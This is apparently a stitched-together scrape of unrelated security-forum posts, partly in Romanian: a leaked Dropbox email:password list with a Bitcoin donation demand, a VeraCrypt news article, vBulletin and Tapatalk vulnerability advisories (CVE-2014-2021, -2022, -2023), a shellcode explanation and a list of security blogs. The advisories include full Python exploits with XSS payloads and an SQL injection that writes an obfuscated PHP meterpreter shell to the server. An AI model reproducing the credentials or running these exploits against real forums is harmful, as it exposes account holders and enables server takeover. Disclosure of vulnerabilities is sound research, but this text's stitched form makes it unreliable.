Bigblokesean@yahoo.co.uk:tittybong Bigeyes_tor@hotmail.com:oasistor Biggie9925@hotmail.com:biggie biggirlkrista@hotmail.com:trixie Biggluvis@hotmail.com:amkamiko Biggunz0824@aol.com:memnoch2 Biggyskunk@hotmail.com:matrix Bigjoetownsend@hotmail.com:vintage SEND BTC DONATIONS TO 1Fw7QqUgzbns7yWHH32UnmMxmMMwu6MC6h COME BACK AND CHECK PASTEBIN FOR NEW DROPBOX DROPS THE MORE BTC DONATED WILL REFLECT HOW MANY MORE LOGIN AND PASSWORDS ARE RELEASED PUBLIC. Via: DROPBOX.COM HACKED First Teaser - Pastebin.com

Acolo te duci din doua motive: 1. Vinzi: CC-uri, banking trojan sau alte porcarii 2. Cumperi: CC-uri, banking trojan sau alte porcarii Vorbeste cu adminu si zi-i de ce vrei sa intri. Minte-l cu ceva.

A fork of TrueCrypt's code, VeraCrypt strengthens the open source encryption software's transformation process and addresses other weaknesses. By Paul Rubens | Posted October 13, 2014 If you're reluctant to continue using TrueCrypt now that the open source encryption project has been abandoned, and you don't want to wait for the CipherShed fork to mature, one alternative that's well worth investigating is VeraCrypt. VeraCrypt is also a fork of the original TrueCrypt code, and it was launched in June 2013. IT security consultant Mounir Idrassi, who is based in France, runs the project and is its main contributor. Idrassi's motivation for developing VeraCrypt stems back to 2012 when he was asked to integrate TrueCrypt with a client's product. Before doing this he carried out a security audit of the code and discovered some issues. "There were no big problems, no backdoors or anything like that. But there were some small things, so we decided to start VeraCrypt," he said. Idrassi said the main weakness in TrueCrypt was that - in his view - it was not secure against brute force attacks. Specifically, the way the software transformed a password to derive a key was not good enough, he said. "TrueCrypt uses a transformation that is not very complex. It is not sufficient, especially now with cloud cracking systems," he explained. TrueCrypt Weakness In technical terms, when a system partition is encrypted, TrueCrypt uses PBKDF2-RIPEMD160 with 1,000 iterations. For standard containers and other (i.e. non system) partitions, TrueCrypt uses at most 2,000 iterations. What Idrassi did was beef up the transformation process. VeraCrypt uses 327,661 iterations of the PBKDF2-RIPEMD160 algorithm for system partitions, and for standard containers and other partitions it uses 655,331 iterations of RIPEMD160 and 500,000 iterations of SHA-2 and Whirlpool, he said. While this makes VeraCrypt slightly slower at opening encrypted partitions, it makes the software a minimum of 10 and a maximum of about 300 times harder to brute force. "Effectively, something that might take a month to crack with TrueCrypt might take a year with VeraCrypt," Idrassi said. As a result of this change, the VeraCrypt storage format is incompatible with TrueCrypt. While that could be a problem for anyone looking to move from TrueCrypt to VeraCrypt, Idrassi said he is working on a conversion tool which will be available within the next three months. Better than TrueCrypt As well as increasing the number of iterations that are carried out, Idrassi said he has addressed weaknesses in the API and drivers, and in parameter checking. The code has also been run against static analysis tools and changes made to correct defects that the analysis detected. "Our focus has been on security so far, but the next step will be to add new features," Idrassi said, adding that new features will include compatibility with UEFI (to make the software work with Windows 8 and 10, for example) and capabilities for steganography – used to hide information in things like digital image files. An obvious question to ask is whether Idrassi has considered teaming up with the CipherShed project. He said he was contacted by Bill Cox, a member of the CipherShed project management committee, back in June and asked to help, but he is too busy. "I don't have a lot of time but I can certainly contribute patches and things like that," he said. But there are other reasons why Idrassi is reluctant to get involved. "The main issue I have is that we don't agree on one thing: CipherShed think it is OK to continue using the TrueCrypt format (using the smaller number of iterations.) But we don't consider it secure enough - not to provide a high level of security against people or organizations with huge resources," he said. The NSA Effect Idrassi hinted that breaking compatibility with TrueCrypt is a good idea for another reason too. "For more than 10 years, law enforcement agencies have developed an infrastructure and tools to do forensic analysis of TrueCrypt volumes," he said. Changing format and adding complexity is therefore not something that security agencies welcome, which, he suggested, makes it a problem for any U.S. based developers to contribute to VeraCrypt. "If you contribute to a project like this then you will be on a watch list in the U.S. We are based in France, so this is not a problem for us," he said. As a result, VeraCrypt has few contributors apart from Idrassi himself. "This is not a game," he said. "It is very serious and we do it as professionals. We are very clear: The project is public, the French authorities are aware of it. But that's why not a lot of people contribute." No TrueCrypt Conspiracy As for the reason that TrueCrypt was abandoned by its original authors, Idrassi sees no cause for alarm. "I am sure the people involved in TrueCrypt couldn't have stayed anonymous and the security agencies knew who they were," he said. "But when you look at the code, you get the idea that these people must have been in their 40s back in 1995. So now they are in their 60s, and they are probably tired or retired. "When they stopped the project they knew that it would cause new initiatives to start. I certainly don't believe there was anything suspicious,"Idrassi said. Paul Rubens has been covering enterprise technology for over 20 years. In that time he has written for leading UK and international publications including The Economist, The Times, Financial Times, the BBC, Computing and ServerWatch. Sursa: VeraCrypt a Worthy TrueCrypt Alternative - eSecurity Planet

Da, e praf. Exploit-urile aici: https://rstforums.com/forum/exploituri-si-pocs.rst Pentru Tapatalk nu era exploit-ul public, doar advisory-ul.

/admincp/api.php /admincp/apistats.php /admincp/apilog.php Fixed the "1337" way

CVE-2014-2021 - vBulletin 5.x/4.x - persistent XSS in AdminCP/ApiLog via xmlrpc API (post-auth) Overview date : 10/12/2014 cvss : 4.6 (AV:N/AC:H/Au:S/C:P/I:P/A:P) base cwe : 79 vendor : vBulletin Solutions product : vBulletin 4 versions affected : latest 4.x and 5.x (to date); verified <= 4.2.2 ; <= 5.0.x * vBulletin 5.0.5 (verified) * vBulletin 4.2.2 (verified) * vBulletin 4.2.1 (verified) * vBulletin 4.2.0 PL2 (verified) exploitability : * remotely exploitable * requires authentication (apikey) * requires non-default features to be enabled (API interface, API-Logging) * requires user interaction to trigger exploit (admincp - admin views logs) patch availability (to date) : None Abstract vBulletin 4/5 does not properly sanitize client provided xmlrpc attributes (e.g. client name) allowing the remote xmlrpc client to inject code into the xmlrpc API logging page. Code is executed once an admin visits the API log page and clicks on the API clients name. risk: rather low - due to the fact that you the api key is required you can probably use CVE-2014-2023 to obtain the api key Details vulnerable component: ./admincp/apilog.php?do=viewclient apilog.php does not sanitize xmlrpc client provided data before passing it to print_label_row to generate the output page. Proof of Concept (PoC) see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021 1) prerequesites 1.1) enable API, generate API-key logon to AdminCP goto "vBulletin API"->"API-Key" and enable the API interface, generate key goto "vBulletin API"->"API-Log" and enable all API logging 2) run PoC edit PoC to match your TARGET, APIKEY (, optionally DEBUGLEVEL) run PoC, wait for SUCCESS! message 3) trigger exploit logon to AdminCP goto "vBulletin API"->"API-Log" and hit "view" in search results click on "client name" the injected msgbox pops up Timeline 2014-01-14: initial vendor contact - no reply 2014-01-24: vendor contact - no reply 2014-10-13: public disclosure Contact tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021 (0x721427D8) #!/usr/bin/env python# -*- coding: utf-8 -*- ''' @author: tintinweb 0x721427D8 ''' import urllib2, cookielib, urllib, json, hashlib class Exploit(object): baseurl = None cookies = None def __init__(self,baseurl,params, debuglevel=1): self.cookies = cookielib.LWPCookieJar() handlers = [ urllib2.HTTPHandler(debuglevel=debuglevel), urllib2.HTTPSHandler(debuglevel=debuglevel), urllib2.HTTPCookieProcessor(self.cookies) ] self.browser = urllib2.build_opener(*handlers) self.baseurl=baseurl self.params = params def call(self,path="",data={}): assert(isinstance(data,dict)) data = urllib.urlencode(data) req = urllib2.Request("%s%s"%(self.baseurl,path),data) req.add_header("Content-Type", "application/x-www-form-urlencoded") return self.browser.open(req) def call_json(self,path=None,data={}): try: x=self.call(path,data).read() print "raw_response", x resp = json.loads(x) except urllib2.HTTPError, he: resp = he.read() return resp def vb_init_api(self): params = {'api_m':'api_init'} params.update(self.params) data = self.call_json("?%s"%(urllib.urlencode(params))) self.session = data return data def vb_call(self, params): api_sig = self._vb_build_api_sig(params) req_params = self._vb_build_regstring(api_sig) params.update(req_params) data = self.call_json("?%s"%(urllib.urlencode(params)),data=params) if not isinstance(data, dict): return data if 'errormessage' in data['response'].keys(): raise Exception(data) return data def _ksort(self, d): ret = [] for key, value in [(k,d[k]) for k in sorted(d.keys())]: ret.append( "%s=%s"%(key,value)) return "&".join(ret) def _ksort_urlencode(self, d): ret = [] for key, value in [(k,d[k]) for k in sorted(d.keys())]: ret.append( urllib.urlencode({key:value})) return "&".join(ret) def _vb_build_api_sig(self, params): apikey = self.params['apikey'] login_string = self._ksort_urlencode(params) access_token = str(self.session['apiaccesstoken']) client_id = str(self.session['apiclientid']) secret = str(self.session['secret']) return hashlib.md5(login_string+access_token+client_id+secret+apikey).hexdigest() def _vb_build_regstring(self, api_sig): params = { 'api_c':self.session['apiclientid'], 'api_s':self.session['apiaccesstoken'], 'api_sig':api_sig, 'api_v':self.session['apiversion'], } return params if __name__=="__main__": TARGET = "http://localhost:8008/sectest/vbulletin_5/api.php" APIKEY = "G4YvWVhp" DEBUGLEVEL = 0 # 1 to enable request tracking print "vBulletin 5.x / 4.x - XSS in API" ### 1. XSS ''' vbulletin: admincp => settings: options => vbulletin API and Mobile Application Options * enable vbulletin API = yes * enable API log = yes xss in: 1) http://xxxx/vb/admincp/apistats.php?do=client 2) click on hex<video><source/**/onerror='alert(1)'>hex 2.1) e.g. http://xxxx/vb/admincp/apilog.php?do=viewclient&apiclientid=1 ''' params = {'clientname':"hex<video><source/**/onerror='alert(/clientname_1/)'>hex1", 'clientversion':"hex<video><source/**/onerror='alert(2)'>hex2", 'platformname':"hex<video><source/**/onerror='alert(3)'>hex3", 'platformversion':"hex<video><source/**/onerror='alert(4)'>hex4", 'uniqueid':"hex<video><source/**/onerror='alert(5)'>hex5", 'apikey':APIKEY} print "[ 1 ] - xss - inject alert() to admincp" x = Exploit(baseurl=TARGET,params=params,debuglevel=DEBUGLEVEL) vars = x.vb_init_api() print vars """ $calls = array( 'methods' => array( 'login_login', 'api_init' ), 'login_login' => array( 'POST' => array( 'vb_login_username' => 'admin', 'vb_login_password' => 'password', ), ), 'api_init' => array( 'sessionhash' => '{session.dbsessionhash}' ) ); """ print " [*] GOT SESSIONHASH:",vars.get('sessionhash','<no-sessiohash>') ''' calls = {'methods':['api_init'], 'api_init':{ 'sessionhash':vars['sessionhash'] }} ''' # just a dummy call x.vb_call(params={'api_m':'api_forumlist', 'type':'t', 'x':"1"}) print "[ *] SUCCESS! - now make an admin visit %s/admincp/apilog.php?do=viewclient&apiclientid=%s to trigger the XSS :)"%("/".join(TARGET.split("/")[:-1]),vars['apiclientid']) print "-- quit --" Sursa: https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021 Exploit: https://github.com/tintinweb/pub/blob/master/pocs/cve-2014-2021/poc_cve-2014-2021.py

CVE-2014-2022 - vbulletin 4.x - SQLi in breadcrumbs via xmlrpc API (post-auth) Overview date : 10/12/2014 cvss : 7.1 (AV:N/AC:H/Au:S/C:C/I:C/A:C) base cwe : 89 vendor : vBulletin Solutions product : vBulletin 4 versions affected : latest 4.x (to date); verified <= 4.2.2 * vBulletin 4.2.2 (verified) * vBulletin 4.2.1 (verified) * vBulletin 4.2.0 PL2 (verified) exploitability : * remotely exploitable * requires authentication (apikey) patch availability (to date) : None Abstract vBulletin 4 does not properly sanitize parameters to breadcrumbs_create allowing an attacker to inject arbitrary SQL commands (SELECT). risk: rather low - due to the fact that you the api key is required you can probably use CVE-2014-2023 to obtain the api key Details vulnerable component: ./includes/api/4/breadcrumbs_create.php vulnerable argument: conceptid which is sanitized as TYPE_STRING which does not prevent SQL injections. Proof of Concept (PoC) see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2022 1) prerequesites 1.1) enable API, generate API-key logon to AdminCP goto "vBulletin API"->"API-Key" and enable the API interface, generate key 2) run PoC edit PoC to match your TARGET, APIKEY (, optionally DEBUGLEVEL) provide WWW_DIR which is the place to write the php_shell to (mysql must have permissions for that folder) Note: meterpreter_bind_tcp is not provided run PoC, wait for SUCCESS! message Note: poc will trigger meterpreter shell meterpreter PoC scenario requires the mysql user to have write permissions which may not be the case in some default installations. Timeline 2014-01-14: initial vendor contact, no response 2014-02-24: vendor contact, no response 2014-10-13: public disclosure Contact tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2022 (0x721427D8) #!/usr/bin/env python# -*- coding: utf-8 -*- ''' @author: tintinweb 0x721427D8 ''' import urllib2, cookielib, urllib, json, hashlib class Exploit(object): baseurl = None cookies = None def __init__(self,baseurl,params, debuglevel=1): self.cookies = cookielib.LWPCookieJar() handlers = [ urllib2.HTTPHandler(debuglevel=debuglevel), urllib2.HTTPSHandler(debuglevel=debuglevel), urllib2.HTTPCookieProcessor(self.cookies) ] self.browser = urllib2.build_opener(*handlers) self.baseurl=baseurl self.params = params def call(self,path="",data={}): assert(isinstance(data,dict)) data = urllib.urlencode(data) req = urllib2.Request("%s%s"%(self.baseurl,path),data) req.add_header("Content-Type", "application/x-www-form-urlencoded") return self.browser.open(req) def call_json(self,path=None,data={}): try: x=self.call(path,data).read() print "raw_response", x resp = json.loads(x) except urllib2.HTTPError, he: resp = he.read() return resp def vb_init_api(self): params = {'api_m':'api_init'} params.update(self.params) data = self.call_json("?%s"%(urllib.urlencode(params))) self.session = data return data def vb_call(self, params): api_sig = self._vb_build_api_sig(params) req_params = self._vb_build_regstring(api_sig) params.update(req_params) data = self.call_json("?%s"%(urllib.urlencode(params)),data=params) if not isinstance(data, dict): return data if 'errormessage' in data['response'].keys(): raise Exception(data) return data def _ksort(self, d): ret = [] for key, value in [(k,d[k]) for k in sorted(d.keys())]: ret.append( "%s=%s"%(key,value)) return "&".join(ret) def _ksort_urlencode(self, d): ret = [] for key, value in [(k,d[k]) for k in sorted(d.keys())]: ret.append( urllib.urlencode({key:value})) return "&".join(ret) def _vb_build_api_sig(self, params): apikey = self.params['apikey'] login_string = self._ksort_urlencode(params) access_token = str(self.session['apiaccesstoken']) client_id = str(self.session['apiclientid']) secret = str(self.session['secret']) return hashlib.md5(login_string+access_token+client_id+secret+apikey).hexdigest() def _vb_build_regstring(self, api_sig): params = { 'api_c':self.session['apiclientid'], 'api_s':self.session['apiaccesstoken'], 'api_sig':api_sig, 'api_v':self.session['apiversion'], } return params if __name__=="__main__": TARGET = "http://192.168.220.131/vbb4/api.php" APIKEY = "4FAVcRDc" REMOTE_SHELL_PATH = "/var/www/myShell.php" TRIGGER_URL = "http://192.168.220.131/myShell.php" DEBUGLEVEL = 0 # 1 to enable request tracking ### 2. sqli - simple - write outfile print "[ 2 ] - sqli - inject 'into outfile' to create file xxxxx.php" params = {'clientname':'fancy_exploit_client', 'clientversion':'1.0', 'platformname':'exploit', 'platformversion':'1.5', 'uniqueid':'1234', 'apikey':APIKEY} x = Exploit(baseurl=TARGET,params=params) vars = x.vb_init_api() print vars ''' x.vb_call(params={'api_m':'breadcrumbs_create', 'type':'t', #'conceptid':"1 union select 1 into OUTFILE '%s'"%REMOTE_SHELL_PATH, 'conceptid':"1 union select 1 into OUTFILE '%s'"%(REMOTE_SHELL_PATH) }) print "[ *] SUCCESS! - created file %s"%TRIGGER_URL ''' ### 3. sqli - put meterpreter shell and trigger it print "[ 3 ] - sqli - meterpreter shell + trigger" with open("./meterpreter_bind_tcp") as f: shell = f.read() shell = shell.replace("<?php","").replace("?>","") #cleanup tags shell = shell.encode("base64").replace("\n","") #encode payload shell = "<?php eval(base64_decode('%s')); ?>"%shell # add decoderstub shell = "0x"+shell.encode("hex") # for mysql outfile x.vb_call(params={'api_m':'breadcrumbs_create', 'type':'t', 'conceptid':"1 union select %s into OUTFILE '%s'"%(shell,REMOTE_SHELL_PATH)}) print "[ *] SUCCESS! - triggering shell .. (script should not exit)" print "[ ] exploit: #> msfcli multi/handler PAYLOAD=php/meterpreter/bind_tcp LPORT=4444 RHOST=<TARGET_IP> E" print "[ *] shell active ... waiting for it to die ..." print urllib2.urlopen(TRIGGER_URL) print "[ ] shell died!" print "-- quit --" Sursa: https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2022 Exploit: https://github.com/tintinweb/pub/blob/master/pocs/cve-2014-2022/poc_cve-2014-2022.py

[h=1]CVE-2014-2023 - Tapatalk for vbulletin 4.x - multiple blind sql injection (pre-auth)[/h] [h=2]Overview[/h] date : 10/12/2014 cvss : 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) base cwe : 89 vendor : Tapatalk Inc product : Tapatalk for vBulletin 4.x versions affected: latest (to date) 5.2.1 (verified) 4.9.0 (verified) exploitability : * remotely exploitable * NO authentication required * NO user interaction required * NO special configuration required (default settings) [h=2]Abstract[/h] Tapatalk for vBulletin 4.x does not properly sanitize some xmlrpc calls allowing unauthenticated users to inject arbitrary SQL commands. risk: high !! Note !! - this is a preliminary VulnNote. The full PoC / Description will be made available within the next 7 days (see contact) to allow mobiquo to fix this. googledork: see PoC code [h=2]Details[/h] vulnerable component: * stripped // see full VulnNote - (contact) xmlrpc request is decoded, decoded attacker provided values are directly being used in sql query. [h=2]Proof of Concept (PoC)[/h] see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023 1) prerequesites vBulletin 4.x with Tapatalk for vBulletin 4.x installed 2) run PoC edit PoC to match your TARGET (, optionally DEBUG=True) (optionally) edit your query to extract specific database values Note: PoC will try to detect tapatalk on that host run PoC by default extracts * mysql root hash (in case vBulletin db user has permissions to do so) * vbulletin db record fields (apikey) - perfectly chains with CVE-2014-2023 only limited by the vBulletin db_user access permissions [h=2]Timeline[/h] 2014-01-14: initial vendor contact, no response 2014-02-24: vendor contact, no response 2014-10-13: public disclosure [h=2]Contact[/h] tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023 Sursa: https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023

Le voi posta la Exploit-uri in urmatoarele 10 minute.

Salut, Din cauza unor probleme de securitate cu jegul asta, am decis sa il scoatem. Cativa membri au gasit in trecut niste XSS-uri, iar acum a aparut (inca nu e public) un SQL Injection. Muie Tapatalk! De asemenea, s-au mai descoperit vreo 2 SQL Injection in vBulletin, dar exploatarea e ceva mai dificila. Oricum pe acestea le-am fixat. Muie vBulletin! Ne cerem scuze pentru aceste probleme.

Bre, e un SHELLCODE, nu un EXPLOIT! Use case: - se da una bucata exploit (* buffer overflow sau altceva) intr-un software care ruleaza ca root (ProFTPD, PostFix sau mai stiu eu ce). E NECESAR! - se ruleaza acel exploit folosind acest shellcode, rezultatul fiind un nou cont cu permisiuni de root. Acel chmod poate fi util in anumite conditii. - se logheaza frumos pe SSH cu noul cont Nota: in urma executarii exploit-ului procesul poate sa crape. Si in cazul de fata ai chiar acest avantaj: poate sa crape procesul, tu ai deja acces full pe server. Se putea face backconnect de exemplu, dar aici apar probleme de iptables (firewall). La fel si cu port bind. V-ati prins?

[h=2]Introduction[/h] How do we stay up-to-date with the latest security news? Where do we find the best security solutions to fight malware? Who can we follow to learn about the latest threats and online attacks so that we can protect ourselves? With security in our minds, no matter we are common people or a big company name, we need to understand technology if we want to prevent data loss and privacy breaches. But with so many security blogs out there, which one should we follow? We have put together a list of security blogs from independent individuals and big names in the IT industry, so that you can benefit from their knowledge and insight. Therefore, if you need best practices, how-to articles, online safety research or the latest security news, feel free to bookmark this article and access it whenever you feel necessary. [h=2]The List[/h] [h=3]1. Krebs on Security[/h] Brian Krebs is the man behind Krebs on Security. Being hacked himself in 2001, he takes a personal interest in online security and is one of the well-known names in today’s security landscape. He covers topics from latest threats, privacy breaches and cyber-criminals to major security news. [h=3]2. Schneier on Security[/h] Bruce Schneider is probably the most well-known name that you can recognize in our list, and was even called a “security guru” by The Economist. He wrote books, hundreds of articles, essays and security papers on security matters. At the same time, he is a known figure in the media environment which recognize him as an important voice for the online security, not only for his knowledge on the matter, but also because he knows how to express his opinions. [h=3]3. TaoSecurity[/h] This security blog is run by Richard Bejtlich, Chief Security Officer at Mandiant and author of many books on security. With an extensive background on cyber-criminal world and malicious attacks on enterprise networks, he shares his experience on digital defense, network monitoring and detection on his security blog. Since a great number of network attacks come from China, he is specialized on Chinese online criminals. [h=3]4. US-CERT[/h] This is the official website of the Department of Homeland Security, from USA. Though it is not a classical security blog, its purpose is to improve Internet security by providing specialized and well detailed information on cyber-criminal activities, malware, phishing attempts and online threats. To use their own words: “US-CERT strives for a safer, stronger Internet for all Americans by responding to major incidents, analyzing threats, and exchanging critical cyber-security information with trusted partners around the world.” [h=3]5. Dark Reading[/h] Dark Reading is a widely-read cyber security site that addresses professionals from the IT environment, security researchers and technology specialists. They use their experience and knowledge to provide articles, recommendations, news and information on IT security. [h=3]6. CIO[/h] CIO is the place where you find news, information technology articles, insight and analysis on major data breaches and online threats. Covering multiple aspects of world wide web, it provides in-depth, content rich information for IT professionals and normal users. [h=3]7. Network Security Blog[/h] Martin McKeay is the voice of this security blog, where you can find information and news on privacy and security issues. As Martin says: “I took up blogging as a means to extend my knowledge and test my ideas about security…” [h=3]8. Security Watch with Neil Rubenking[/h] Known for his direct and witty style, Neil Rubenking is the man you have to listen if you search for technical advice on the main security solutions, from firewalls, antivirus and antispam products to full security suites. Detailed reports and sharp analysis of security programs place him be on your follow list if you look for this type if information. [h=3]9. Paul’s Security Weekly[/h] Paul’s Security Weekly, founded by Paul Asadoorian, brings you security news, useful technical articles, research studies and valuable information on hacking and cyber-crime through various channels, from blog posts, videos to podcasts. [h=3]10. PCMag.com[/h] One of the most popular sites in the software industry, PC Magazine comes with reviews and studies on the latest products for online security. For an objective analysis of a product you may be looking, don’t forget to look for the dedicated article on this website. [h=3]11. Wired[/h] One of the classical North American publications reporting on technology and its role in culture, economy and politics, Wired approaches topics on online privacy, cyber-criminal threats, systems security and the latest alerts. [h=3]12. Forbe’s Firewall[/h] Forbe’s Firewall comes from one of the leading media company in the online environment and provides strong analysis, reliable tools and real-time reports for cyber-security news and information on the latest online threats. [h=3]13. TechRepublic[/h] TechRepublic provides large resources for the online industry, such as blog articles, forums, technical papers and security data. All the valuable information available helps IT professionals and technology leaders to come with the best decissions on their business processes. [h=3]14. Zero Day[/h] The Zero Day security blog is important for all the people which are part of the IT industry and you should follow it to stay up-to-date with the latest security analysis, software vulnerabilities, malware attacks and network threats. [h=3]15. Securosis[/h] Securosis is a security research and advisory company that offers security services for companies and organizations. At the same time, you can find on their security blog some useful articles and insight on managing and protecting online data. [h=3]16. The Guardian Information Security Hub[/h] Known for its quality articles on world news, Guardian offers a section dedicated to information security for companies and individuals. To stay up-to-date with the latest articles and news on cyber security, make sure you follow this site. [h=3]17. Help Net Security[/h] This security site is a popular place for data and security news and you can find here the latest information and articles related to the IT industry. [h=3]18. Techworld Security[/h] The section dedicated to security on this site analyzes the latest malware threats and zero-day exploits. You can find here other important topics and subjects, such as security articles, how-to documents and software reviews. [h=3]19. Fox IT Security Blog[/h] This security blog is a very good source of information on online security, technology news and cyber crime defense. [h=3]20. SC Magazine[/h] SC Magazine comes in the IT environment with technical information and data analysis to fight the present online security threats. Their site provides testing results for e-mail security, mobile devices, cloud and web security. [h=3]21. Network Computing[/h] The content of this security blog focuses on cloud technology and enterprise infrastructure systems. Its published articles cover security solutions on how to deliver applications and services for an increasingly large threat environment in the business world, news and expert advice. [h=3]22. Infosecurity Magazine[/h] Infosecurity Magazine is an online magazine which covers not only security articles on popular topics, but is also dedicated to security strategy, valuable insights and technical approaches for the online industry. [h=3]23. SANS Institute AppSec Blog[/h] This security site addresses the growing malware threats in the online world by providing training, research, certification and educational resources for IT specialists. [h=3]24. Threat Track Security[/h] This security blog keeps you up-to-date with the latest innovations and developments in the IT industry, from security exploits to software vulnerabilities and cyber-criminal attempts. [h=3]25. CSO Online[/h] CSO focuses on information technology, access management for enterprise servers, loss prevention, cybercriminal threats and software vulnerabilities. [h=2]Security blogs from software providers in the IT industry[/h] [h=3]26. Sophos security blog[/h] Naked Security is Sophos’s award-winning threat news room, giving you news, opinion, advice and research on computer security issues and the latest internet threats. Naked Security is the blog of security company SOPHOS and the place where you can find news, research studies, advices and opinions. Categories range from mobile security threats to operating systems and malware articles. Naked Security is updated multiple times per day and receives around 1.5 million pageviews per month. It has won numerous awards and it is considered one of the best security blogs. [h=3]27. Kaspersky Lab’s ThreatPost[/h] Threatpost is the leading security news website that is part of The Kaspersky Lab. Their articles cover important stories and relevant security news for the online world. They are recognized as an important source of news for online security in important newspapers and publications, such as New York Times, USA Today or The Wall Street Journal. [h=3]28. Kaspersky Lab’s Securelist[/h] Securelist is a security blog run by Kaspersky Lab and it addresses a large audience, providing some of the best security subjects on cybercriminal activities and data stealing malware. You can find here security information that focuses on malware, phishing and other threats from the cyber security world. [h=3]29. Symantec Weblog[/h] Symantec Weblog is a security blog from one of the biggest providers of security solutions world wide, Symantec. Using their technical knowledge and data collected along the years, they come with strong analysis reports and articles on security threats, online criminals, data stealing malware, system vulnerbilities and many others. [h=3]30. Google Online Security Blog[/h] We are surrounded by Google products and services, from their search engine to their web browser, so it is normal to include their security blog in our list. It is a reliable security blog and even more, a reference point on online security and privacy we need to acknowledge. [h=3]31. Zone Alarm Cyber Security Blog[/h] The security blog from ZoneAlarm, one of the well-known vendors of security products, provides valuable information on malware defense and online security. Using their experience on malware, this security blog generates malware alerts, practical security tips and the latest news in the IT industry. [h=3]32. F-Secure Safe & Savvy Blog[/h] A security blog from F-Secure, a company dedicated to online content and privacy protection. On this security blog you will find helpful tips and advises on security issues, from protecting your personal identity to keeping your system safe. [h=3]33. HotforSecurity[/h] The security blog from Bitdefender – one of the leading companies on online security solutions, covers various subjects from the IT world, from Internet scams, online spam and phishing to malware and data stealing software. [h=3]34. McAfee security blog[/h] McAfee security blog provides the latest tips and techniques from security experts to keep you up-to-date with the latest malware trends in the online environment. [h=3]35. Microsoft Malware Protection Center[/h] The Microsoft Malware Protection Center analyzes data from all over the world to provide insight and valuable information on fighting online threats in order to protect users from malware attacks and online crime. [h=3]36. SpiderLabs Security Blog[/h] Investigators and researchers at Trustwave cover the latest technology news on this security blog. Gathering information from research and testing, they publish articles and security studies to fight online hackers and cyber-criminal threats. [h=3]37. Dell SecureWorks[/h] The security blog from Dell SecureWorks provides the latest news and information for IT professionals and users that need to stay up-to-date with online threats and malware attacks. [h=3]38. Malwarebytes Security Blog[/h] The Malwarebytes security blog articles cover the latest malware threats and cyber criminal attempts from the online world. You can find their articles on categories, from cyber-crime, exploits, hacking and malware analysis. [h=3]39. Trend Micro Simply Security[/h] Trend Micro Simply Security site offers expert insights on cloud security, data safety, privacy protection and threat intelligence. [h=3]40. We Live Security[/h] We Live Security, the Eset blog, is an online resource for cyber security articles and this blog covers a large network of security topics from emerging online threats to zero-day exploits. [h=2]Conclusions[/h] We know our list is not perfect, there are so many other security blogs and top influencers in the IT industry that we have not included and we can not assume this list is complete. We try to stay in tune with the latest updates in the industry and we provided a few reasons why you should follow the security blogs above. But, since the Internet world and the security landscape is changing all the time, so must we. So, help us improve our article, let us know what you think, we have no problem in making changes to our article and improve it for the benefit of all. Autor: Aurelian Neagu Sursa: https://heimdalsecurity.com/blog/best-internet-security-blogs/